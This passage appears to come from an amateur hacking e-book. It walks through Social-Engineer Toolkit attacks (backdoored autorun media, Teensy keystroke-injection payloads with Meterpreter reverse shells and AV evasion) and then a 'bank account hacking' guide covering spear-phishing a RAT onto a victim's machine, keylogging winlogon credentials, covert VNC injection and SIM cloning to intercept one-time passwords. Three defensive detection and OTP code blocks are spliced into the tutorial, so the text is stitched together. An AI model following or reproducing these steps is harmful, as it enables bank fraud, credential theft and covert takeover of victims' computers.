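    return not any(sev in ("high", "medium") for sev, _, _ in audit_autorun(text))
```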
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 3


What payload do you want to generate:

  Name:                                     Description:

  1. Windows Shell Reverse_TCP              Spawn a command shell on victim and send back to attacker.
  2. Windows Reverse_TCP Meterpreter        Spawn a meterpreter shell on victim and send back to attacker.
  3. Windows Reverse_TCP VNC DLL            Spawn a VNC server on victim and send back to attacker.
  4. Windows Bind Shell                     Execute payload and create an accepting port on remote system.
  5. Windows Bind Shell X64                 Windows x64 Command Shell, Bind TCP Inline
  6. Windows Shell Reverse_TCP X64          Windows X64 Command Shell, Reverse TCP Inline
  7. Windows Meterpreter Reverse_TCP X64    Connect back to the attacker (Windows x64), Meterpreter
  8. Windows Meterpreter Egress Buster      Spawn a meterpreter shell and find a port home via multiple ports
  9. Import your own executable             Specify a path for your own executable

Enter choice (hit enter for default):


Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...


[-] Backdoor completed successfully. Payload is now hidden within a legit
executable.
[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
[*] The payload can be found in the SET home directory.
[*] Do you want to start the listener now? yes or no: yes
[*] Please wait while the Metasploit listener is loaded...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

msf exploit(handler) >

When doing an ls -al in the SET directory you should notice that there is an autorun folder. Burn the contents of that directory to a DVD or write it to a USB device. Once it is inserted you would be presented with a shell.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at
Thu Sep 09 12:42:32 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >

Teensy USB HID Attack Vector


The Teensy USB HID Attack Vector is a remarkable combination of customized hardware and bypassing restrictions through keyboard emulation. Traditionally, when you insert a DVD/CD or USB device and autorun is disabled, your autorun.inf is not called and you cannot execute your code automatically. With the Teensy HID-based device you can emulate a keyboard and mouse. When you insert the device it is detected as a keyboard, and with the microprocessor and onboard flash storage you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.pjrc.com. Shortly after David Kennedy, Josh Kelley and Adrian Crenshaw's talk on the Teensy devices, a PS3 hack came out using them, and at the time of writing this tutorial they are backordered.

Let's set up our Teensy device to do a WSCRIPT downloader of a Metasploit payload. What will occur here is that a small wscript file will be written out which downloads an executable and executes it. This will be our Metasploit payload, and it is all handled through the Social-Engineer Toolkit.
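Because the Teensy is enumerated as an ordinary keyboard, the detectable anomaly is its typing speed rather than its vendor ID. The following is an added example, not SET's or the book's code: it scans a constructed per-device keystroke stream and reports any run of keystrokes whose sliding-window mean inter-key gap is far below human speed, which a host agent could use to disable the offending device.

```python
"""Spot keystroke injection from a HID device such as the Teensy described above.

Added example, not SET's or the book's code. A programmed HID types far
faster than a person, so a window of consecutive keystrokes with a tiny
mean inter-key gap is the signal. The event stream is constructed (no real
keyboard logs were used) and `device` stands for whatever identifier the
OS exposes for the keyboard an event came from.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class KeyEvent:
    t_ms: float   # timestamp in milliseconds
    device: str   # keyboard the keystroke came from


def sample_events() -> List[KeyEvent]:
    """Constructed stream: a person typing on kbd0 (~180 ms between keys,
    with jitter), then a second keyboard kbd1 appears and types 120 keys
    8 ms apart, as a scripted HID does when it pastes a command."""
    human = [KeyEvent(float(i * 180 + (i * 37) % 40), "kbd0") for i in range(60)]
    injected = [KeyEvent(5000.0 + 8.0 * i, "kbd1") for i in range(120)]
    return sorted(human + injected, key=lambda e: e.t_ms)


def injection_bursts(events: List[KeyEvent], window: int = 20,
                     max_mean_gap_ms: float = 25.0) -> List[Tuple[str, float, float]]:
    """Return (device, start_ms, end_ms) for each run of keystrokes in which
    every sliding window of `window` keys averages under max_mean_gap_ms.
    Overlapping windows are merged into one burst per device."""
    times_by_device: Dict[str, List[float]] = defaultdict(list)
    for ev in events:
        times_by_device[ev.device].append(ev.t_ms)

    bursts: List[Tuple[str, float, float]] = []
    for device, times in times_by_device.items():
        times.sort()
        current = None  # [start, end] of the burst being extended
        for i in range(window - 1, len(times)):
            start, end = times[i - window + 1], times[i]
            if (end - start) / (window - 1) >= max_mean_gap_ms:
                continue
            if current is not None and start <= current[1]:
                current[1] = end
            else:
                if current is not None:
                    bursts.append((device, current[0], current[1]))
                current = [start, end]
        if current is not None:
            bursts.append((device, current[0], current[1]))
    return bursts


def devices_to_block(events: List[KeyEvent]) -> List[str]:
    """Devices a host agent would disable or quarantine (deduplicated, sorted)."""
    return sorted({device for device, _, _ in injection_bursts(events)})
```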
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 6


Welcome to the Teensy HID Attack Vector.
Special thanks to: IronGeek and WinFang
The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystrokedongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Select a payload to create the pde file to import into Arduino:

1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice: 2

Do you want to create a payload and listener yes or no: yes


What payload do you want to generate:

  Name:                                     Description:

  1. Windows Shell Reverse_TCP              Spawn a command shell on victim and send back to attacker.
  2. Windows Reverse_TCP Meterpreter        Spawn a meterpreter shell on victim and send back to attacker.
  3. Windows Reverse_TCP VNC DLL            Spawn a VNC server on victim and send back to attacker.
  4. Windows Bind Shell                     Execute payload and create an accepting port on remote system.
  5. Windows Bind Shell X64                 Windows x64 Command Shell, Bind TCP Inline
  6. Windows Shell Reverse_TCP X64          Windows X64 Command Shell, Reverse TCP Inline
  7. Windows Meterpreter Reverse_TCP X64    Connect back to the attacker (Windows x64), Meterpreter
  8. Windows Meterpreter Egress Buster      Spawn a meterpreter shell and find a port home via multiple ports
  9. Import your own executable             Specify a path for your own executable

Enter choice (hit enter for default):


Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):


[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit
executable.

[*] PDE file created. You can get it under 'reports/teensy.pde'


[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443

[*] Starting the payload handler...

Now that we have everything ready, SET exports a file called teensy.pde to the reports/ folder. Copy that reports folder to wherever you have Arduino installed. For this attack, follow the instructions at PJRC on how to upload your code to the Teensy board; it is relatively simple, you just need to install the Teensy Loader and the Teensy libraries. Once you do that you will have an IDE interface called Arduino. One of the MOST important aspects of this is to ensure you set your board to a Teensy USB Keyboard/Mouse.

Once you have this selected, drag your pde file into the Arduino interface. Arduino/Teensy supports Linux, OSX and Windows. Insert your USB device into the computer and upload your code. This programs your device with the SET-generated code. Below is the upload and the code.

Once the USB device is inserted on the victim machine and the keystrokes have finished, you should be presented with a Meterpreter shell.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at
Thu Sep 09 12:52:32 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)

[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >

So you have now done social engineering with computer support.

This is the most powerful trick to exploit at the moment.
Thanks again to www.social-engineer.org for developing the tool and giving the tutorial.

PART-II
The hacker's Implementation
Chapter 1: Online Bank Account Hacking.
This is a short part which deals with how existing hackers hack bank accounts.
This section is strictly for educational purposes and is meant to aid system administrators by showing how hackers are actually able to hack bank accounts.

Chapter 1:Online Bank Account Hacking.


I would have simply put forward an email account hacking tutorial, but that is not enough to let security personnel know how much risk the common man faces at this moment with internet banking.

So the first step is to install a RAT (remote access trojan) on the victim's computer.
Installing RATs is not difficult, trust me. Just use the following tools:
Spear-Phishing Attack Vector: The spear-phishing attack menu is used for performing targeted email attacks against a victim. You can send multiple emails based on what you harvested, or you can send to individuals. You can also use file formats (for example a PDF bug) and send the malicious attack to the victim in order to hopefully compromise the system.
Website Attack Vector: The web attack vector performs phishing attacks against the victim in the hope they click the link. There is a wide variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
Infectious Media Generator: The infectious USB/DVD creator develops a Metasploit-based payload for you and crafts an autorun.inf file that, once burned or placed on a USB drive, triggers the autorun feature and hopefully compromises the system. This attack vector is relatively simple in nature and relies on deploying the devices to the physical system.
Create a Payload and Listener: This is an extremely simple wrapper around Metasploit to create a payload, export the exe for you and generate a listener. You would need to transfer the exe onto the victim machine and execute it in order for it to properly work.
Mass Mailer Attack: The mass mailer attack allows you to send multiple emails to victims and customize the messages. This option does not allow you to create payloads, so it is generally used to perform a mass phishing attack.
Teensy USB HID Attack Vector: The Teensy USB HID attack is a method that involves purchasing a hardware-based device from pjrc.com and programming it in a manner that makes the small USB microcontroller look and feel exactly like a keyboard.

SMS Spoofing Attack Vector: This module allows you to specially craft SMS messages and send them to a person. You can spoof the SMS source.
Wireless Access Point Attack Vector: This can be used to set up a rogue wireless access point, spoof DNS and redirect all traffic to the attacker.
Third Party Modules: This attack vector consists of the third-party module RATTE (Remote Administration Tool Tommy Edition), which is an HTTP tunneling payload. It can be used in the same way as the website attack vectors but with the added advantage of beating security mechanisms like local firewalls and IPS.

It seems like I have given you the list of social engineering tools. Well, this is how it is done.
There are many ways the black-hooded hackers install RATs. (You can search for different social engineering tricks to install a RAT, but I present a way using the spear phishing attack vector and the website attack vector.)
To begin with, this social engineering toolkit tutorial takes an in-depth look at the spear phishing attack vectors and website attack vectors.

A spear is a weapon with a sharp metal point at the end, and phishing is the method used by crackers to trick the user into believing that fake content and web pages are in fact genuine. Spear phishing is a special type of attack wherein a specific individual is targeted rather than a mass of users, analogous to a spear that can be used to attack only one person at any given point in time. Let us attempt such an attack using the Social Engineer Toolkit.
Selecting option 1 in the social engineering toolkit menu brings up another menu, as shown in Figure 2. Choose the first option here, to perform a mass mailer attack. This attack sends an email to the victim with content that we wish to deliver.

Choosing option 10 from the list of payloads states 'Custom EXE to VBA (sent via RAR)'. This means that we would send the victim a backdoored rar file.

The various payload options available are shown in Figure 2, while in Figure 3 we can see how the Social Engineer Toolkit uses the support from Metasploit's meterpreter extension in spawning a shell and then controlling it in the remote system.
Once you choose the payload to send to the victim, you must provide the victim's email id. The social engineering toolkit requires the user to log in to a valid Gmail account, via which the payload will be sent. There is also a provision for using any other specified SMTP server for email.
The social engineering toolkit has predefined templates to choose from. Figure 4 shows the available templates that can be sent in the form of an email. Customized templates can also be created and saved for future use. Creating custom templates could be advantageous, as they have a higher chance of evading spam filters. Such email would reach the inbox of the victim, who would likely assume it is from a legitimate source.

Website attack vectors


In the social engineering toolkit, the tabnabbing attack method is the one in which you clone the entire website and harvest the keystrokes on that web page on the fake server hosted by the Social Engineer Toolkit. When the user changes tabs, he sees the login page and falls prey to the attack by unwittingly giving his actual details to the attacker.

Other attacks, such as the Metasploit browser exploit method, exploit browser vulnerabilities and pwn a meterpreter shell on the victim machine, thereby giving complete access to the system. The credential harvester method, as the name suggests, helps in stealing the credentials of the victim.

Next in the social engineering toolkit tutorial, choose the template that asks the user for "Java Required". In the subsequent menus, choose the backdoored executable "shikata_ga_nai". It is rated very highly, because it evades antivirus effectively and is also quite powerful in pwning a meterpreter shell on the victim.

Figure 7 shows details of the cloned web attack vector and also mentions that this attack works successfully and has been tested on IE6, IE7, Safari and Firefox. Again we see the influence of Metasploit in compromising the victim, in this social engineering toolkit. Figure 8 shows the pop-up window in the browser, prompting the user to install a Java applet, when the URL browsed is http://192.168.13.128. Should the user click Run, a meterpreter shell is pwned on the system, giving the attacker control over the victim's machine. This can be used during the penetration testing phase to test the awareness of the employees within the organization, with respect to social engineering threats.

Thanks to blog.infosecsolution.com from where I got the above material.

Now, if you have installed a Meterpreter or RAT, you have full control over the PC you want to hack.
Step 2:
Start keylogging. It seems like an age-old way of hacking, but this is how it is done.
Using your own meterpreter.
We will first migrate Meterpreter to the Explorer.exe process so that we don't have to worry about the exploited process getting reset and closing our session.
meterpreter > ps

Process list
============

 PID   Name                Path
 ---   ----                ----
 140   smss.exe            \SystemRoot\System32\smss.exe
 188   winlogon.exe        \??\C:\WINNT\system32\winlogon.exe
 216   services.exe        C:\WINNT\system32\services.exe
 228   lsass.exe           C:\WINNT\system32\lsass.exe
 380   svchost.exe         C:\WINNT\system32\svchost.exe
 408   spoolsv.exe         C:\WINNT\system32\spoolsv.exe
 444   svchost.exe         C:\WINNT\System32\svchost.exe
 480   regsvc.exe          C:\WINNT\system32\regsvc.exe
 500   MSTask.exe          C:\WINNT\system32\MSTask.exe
 528   VMwareService.exe   C:\Program Files\VMware\VMware Tools\VMwareService.exe
 588   WinMgmt.exe         C:\WINNT\System32\WBEM\WinMgmt.exe
 664   notepad.exe         C:\WINNT\System32\notepad.exe
 724   cmd.exe             C:\WINNT\System32\cmd.exe
 768   Explorer.exe        C:\WINNT\Explorer.exe
 800   war-ftpd.exe        C:\Program Files\War-ftpd\war-ftpd.exe
 888   VMwareTray.exe      C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 896   VMwareUser.exe      C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 940   firefox.exe         C:\Program Files\Mozilla Firefox\firefox.exe
 972   TPAutoConnSvc.exe   C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 1088  TPAutoConnect.exe   C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe

meterpreter > migrate 768
[*] Migrating to 768...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768

Finally, we start the keylogger, wait for some time and dump the output.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
tgoogle.cm my credit amex myusernamthi amexpasswordpassword

Could not be easier! Notice how keystrokes such as control and backspace are represented.
As an added bonus, if you want to capture system login information you
would just migrate to the winlogon process. This will capture the credentials
of all users logging into the system as long as this is running.
meterpreter > ps

Process list
=================

 PID   Name           Path
 ---   ----           ----
 401   winlogon.exe   C:\WINNT\system32\winlogon.exe
meterpreter > migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
**** A few minutes later after an admin logs in ****
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!

Here we can see that migrating to the winlogon process allows us to effectively harvest all users logging into that system and capture their credentials. We have captured the Administrator logging in with a password of 'ohnoes1vebeenh4x0red!'.
This means you have access to all the passwords that a user types.
This means all the email accounts can be hacked easily, and in some cases the hacker will be able to get credit card info, CVV details and much more. Maybe secret lovers also.
But wait, I think this tutorial was about hacking bank accounts. Hacking a bank becomes difficult as most of the banks come with something called an online keypad, and the key locations keep on changing. So how will you hack such a system?
There are many ways to bypass this too. Most of the RATs allow you to view the remote computer's desktop. Even Meterpreter has the tools to do that.
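
Both migrations above (into Explorer.exe and then into winlogon.exe) leave the same footprint on a monitored host: a thread created inside a sensitive process by an unrelated one, which Sysmon records as Event ID 8 (CreateRemoteThread). The following is an added example, not code from this page or from Metasploit, that runs that check over constructed Sysmon records flattened to one line each; the PIDs and paths mirror the ps listing above, and the log format and the source allowlist are assumptions.

```python
from dataclasses import dataclass

# Processes worth hiding a credential keylogger in, per the walkthrough above
# (explorer.exe for the user's keystrokes, winlogon.exe for every logon).
SENSITIVE_TARGETS = {"explorer.exe", "winlogon.exe", "lsass.exe"}

# Sources that legitimately create threads in other processes. Assumed allowlist,
# keyed on the full lower-cased path; tune it per estate and never key it on the
# basename alone, since an implant can simply be named svchost.exe.
ALLOWED_SOURCES = {
    r"c:\winnt\system32\csrss.exe",
    r"c:\winnt\system32\services.exe",
}

# Constructed sample: Sysmon events flattened to key=value fields joined by '|'.
# Event ID 8 is CreateRemoteThread. Line 1 is the exploited FTP daemon migrating
# into Explorer (pid 768), line 4 is Explorer migrating into winlogon (pid 401).
SAMPLE_LOG = r"""
EventID=8|UtcTime=2012-05-01 10:14:02|SourceImage=C:\Program Files\War-ftpd\war-ftpd.exe|SourceProcessId=800|TargetImage=C:\WINNT\Explorer.exe|TargetProcessId=768|StartFunction=
EventID=8|UtcTime=2012-05-01 10:14:03|SourceImage=C:\WINNT\system32\csrss.exe|SourceProcessId=160|TargetImage=C:\WINNT\system32\winlogon.exe|TargetProcessId=188|StartFunction=
EventID=1|UtcTime=2012-05-01 10:14:05|Image=C:\WINNT\System32\cmd.exe|ProcessId=724|ParentImage=C:\WINNT\Explorer.exe
EventID=8|UtcTime=2012-05-01 10:20:41|SourceImage=C:\WINNT\Explorer.exe|SourceProcessId=768|TargetImage=C:\WINNT\system32\winlogon.exe|TargetProcessId=401|StartFunction=
"""


@dataclass
class Alert:
    time: str
    source: str
    target: str
    target_pid: str


def parse_event(line: str) -> dict:
    """Split one flattened event line into a field dictionary."""
    fields = {}
    for kv in line.strip().split("|"):
        key, sep, value = kv.partition("=")
        if sep:
            fields[key] = value
    return fields


def basename(path: str) -> str:
    """Lower-cased final path component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def detect_migration(log_text: str) -> list:
    """Flag CreateRemoteThread events whose target is a sensitive process and
    whose source is not on the allowlist: the footprint of 'migrate' above."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "8":
            continue
        source = ev.get("SourceImage", "")
        target = ev.get("TargetImage", "")
        if basename(target) in SENSITIVE_TARGETS and source.lower() not in ALLOWED_SOURCES:
            alerts.append(Alert(ev.get("UtcTime", ""), source, target,
                                ev.get("TargetProcessId", "")))
    return alerts


if __name__ == "__main__":
    for alert in detect_migration(SAMPLE_LOG):
        print(f"{alert.time}  {alert.source} -> {alert.target} (pid {alert.target_pid})")
```

The second alert is the more useful one operationally: a thread created in winlogon.exe by anything other than a handful of system binaries is rare on a healthy host, so that rule can page an analyst with little tuning, whereas injections into explorer.exe need the allowlist refined first.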

Remote VNC injection

Using the Metasploit payload for VNC injection, we can also inject a VNC server remotely, and can have the display thrown back to the host system. Users of the target system will not notice that their display is being shared, though there is a trick: we have to disable the Metasploit courtesy shell which appears on the target system's display. If the courtesy shell is not disabled, then it will show a blue command prompt window at the time of exploitation, as shown in Figure 1.

Figure 1: VNC injection with courtesy shell enabled, by default

This can warn the users of the target system, and result in attack detection. After disabling the courtesy shell, it will not display the blue prompt, as you can see in Figure 2.

Figure 2: VNC injection with courtesy shell disabled

VNC injection can also be used when a user is not logged in; in that case, don't bother to disable the courtesy shell.

In retrospect, it might alarm the victim when a "Metasploit Courtesy Shell" pops up. You can disable this by setting the option DisableCourtesyShell to true, though. Also, because the user used the browser just prior to our infection, he/she would definitely notice if we suddenly took over control of the machine. It is therefore crucial to wait until the path is clear (if that ever happens). Another way of gaining access, as opposed to Java applet infection, would be preferable because it then doesn't matter if the user is logged in at the time, but be sure you don't disable the courtesy shell in that scenario.
So what you have done is you have got the bank login and password; now you can see what the user is clicking also.

Step 3:
Getting the One Time Password. Well, this is the most difficult task that the hacker faces when he tries to find the One Time Password.
Let's have a scenario:
The victim is applying for an online virtual credit card. The registration process is as follows:
Virtual credit or debit cards help you keep your actual credit card details and bank details confidential, especially while shopping online.

How to Create or Generate Online State Bank of India (SBI) Virtual Credit Card
1. Login to your SBI internet banking (personal banking) account on the OnlineSBI website.
2. After you are logged in, go to the Requests tab.
3. In the left pane go to the State Bank Virtual Card option.
4. Fill in the requisite amount. Note that the minimum amount is Rs. 100/- and the maximum amount limit is Rs. 50,000/-. This means you can not have a virtual credit card with a virtual credit limit of more than Rs. 50000/-.
Once you are sure of the amount or credit limit, tick the agreement and click on the Generate button.
5. You will be asked to confirm the details.
6. A One Time Password (OTP) will be sent to your SBI Internet banking registered mobile number. Enter that password in the next screen.
7. Your SBI Virtual Credit Card will be created and ready for use.
8. You can see the status of your SBI Virtual Credit Card anytime by going to the Virtual Card Details tab. It will show you the card status as Used, Unused or Cancelled.

Up to step 5 the hacker can view what is going on on its victim's computer.
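
Step 6 is the control that the rest of this section sets out to defeat. From the bank's side, the value of an OTP that has been read off a keylogger, a shared screen or a duplicate SIM is reduced if the code is bound to exactly one transaction, expires quickly and is consumed on first use, and if the SMS states the amount and beneficiary so the customer can spot a substituted request. The following is an added example of that server-side design, not code from this page nor any bank's implementation; the server key, the time-to-live and the message format are assumptions.

```python
import hashlib
import hmac
import secrets
import time


class TransactionOtp:
    """Server-side OTP bound to one transaction. The code is an HMAC over the
    transaction fingerprint (account, amount, beneficiary) plus a nonce and the
    issue time, expires after ttl_seconds, and is consumed on first use whatever
    the outcome. Assumed design for illustration."""

    def __init__(self, server_key: bytes, ttl_seconds: int = 120, clock=time.time):
        self.key = server_key
        self.ttl = ttl_seconds
        self.clock = clock            # injectable so expiry can be tested
        self.pending = {}             # txn_id -> (fingerprint, issued_at, nonce)

    @staticmethod
    def fingerprint(account: str, amount_paise: int, beneficiary: str) -> bytes:
        return f"{account}|{amount_paise}|{beneficiary}".encode()

    def _code(self, txn_id: str, fp: bytes, issued_at: int, nonce: bytes) -> str:
        mac = hmac.new(self.key, f"{txn_id}|{issued_at}|".encode() + fp + nonce,
                       hashlib.sha256).digest()
        offset = mac[-1] & 0x0F                       # HOTP-style dynamic truncation
        value = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
        return f"{value % 1_000_000:06d}"

    def issue(self, txn_id: str, account: str, amount_paise: int, beneficiary: str):
        """Create the challenge. Returns (otp, sms_text); the SMS names the
        amount and beneficiary so a substituted transaction is visible to the
        customer even if the code itself is intercepted."""
        fp = self.fingerprint(account, amount_paise, beneficiary)
        issued_at = int(self.clock())
        nonce = secrets.token_bytes(8)
        self.pending[txn_id] = (fp, issued_at, nonce)
        otp = self._code(txn_id, fp, issued_at, nonce)
        sms = (f"OTP {otp} for Rs.{amount_paise // 100}.{amount_paise % 100:02d} "
               f"to {beneficiary}, valid {self.ttl}s. Do not share it.")
        return otp, sms

    def verify(self, txn_id: str, account: str, amount_paise: int,
               beneficiary: str, otp: str) -> str:
        """Return 'ok' or a reason code. The pending entry is removed on the
        first attempt, so a captured code cannot be replayed or brute-forced."""
        entry = self.pending.pop(txn_id, None)
        if entry is None:
            return "unknown_or_used"
        fp, issued_at, nonce = entry
        if self.clock() - issued_at > self.ttl:
            return "expired"
        if fp != self.fingerprint(account, amount_paise, beneficiary):
            return "transaction_mismatch"   # amount or beneficiary was altered
        expected = self._code(txn_id, fp, issued_at, nonce)
        if not hmac.compare_digest(expected, otp):
            return "bad_code"
        return "ok"


if __name__ == "__main__":
    svc = TransactionOtp(secrets.token_bytes(32))
    code, text = svc.issue("T1", "ACC-001", 5_000_000, "SBI Virtual Card")
    print(text)
    print(svc.verify("T1", "ACC-001", 5_000_000, "SBI Virtual Card", code))
    print(svc.verify("T1", "ACC-001", 5_000_000, "SBI Virtual Card", code))
```

Transaction binding does not help against an attacker who both controls the session and receives the SMS, which is exactly the combination the rest of this section describes; what it does is make the OTP useless for any transaction other than the one the customer was shown, and make the customer's own reading of the SMS a meaningful check rather than a formality.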
Now comes the risky job. It's time to hack.
Step 5.1: You need to do some investment in this step. In one of my acquaintances with a hacker who is into professional bank hacking, in a chatroom, he told me that he uses a duplicate of the SIM that the victim uses. So he can get the same message that the victim is getting.
Well, according to his claims he can get a duplicate SIM card for $1000.
The amount I suppose is for bribing the insider in the telecommunication department to get the SIM card number of the victim.
I present the way to clone a SIM after he gets the SIM number. You don't need to clone a SIM. You can just program it. You can directly go to page 411 in case you have got the SIM number from the Insider.

But I present the following steps as proof of concept:

The stages
Step 1: Scan the SIM to extract IMSI (just read it!) and Ki, the 128 bit key (for COMP128-1 only, so far.)
Step 2: Now put the IMSI and Ki into some card software
Step 3: And then copy it into a new SIM card
Step 4: We now have a cloned SIM

Step 1:
First we need to read the SIM
A small reader, connected to a serial port.
Home made for $5

Step 1.1:
Then we need to find Ki
We need Ki and IMSI; we can use Simscan from Dejan's pages, which will break COMP128-1.
The page below shows where to get the software:

Here's the software:

Simscan ready to go.

Now scanning the card
-->Searching for the key

Getting there:

The result slowly appears (this one looks interesting!)

Now we have it!
This was a SIM supplied to delegates at a meeting; Ki is a bit obvious, isn't it!

Now to create the software

Using some more software from the Internet called KiSsMi we create the software for the card.

We now need to program the SIM

We use a single chip PIC computer which is in a SIM shaped package (GOLD CARD).
We use a smart card programmer (easily bought on the Internet).
This is the step the hacker uses if he gets the SIM number from the Insider:

The programmer with the card ready to go.

The software for the programmer:

Just load in the software we created with KiSsMi using VxTools.

Charles Brookson is thanked for giving the proof of the concept.

And we now have a cloned card.

Using these steps you can get the OTP.

Bingo, the bank account has been compromised. So I would like the banks to take note of this where this kind of hacking is prevalent.

Contact me:
scyptaxxeler [at the rate of] gmail {dot} com
I will write the Second Volume in short time.
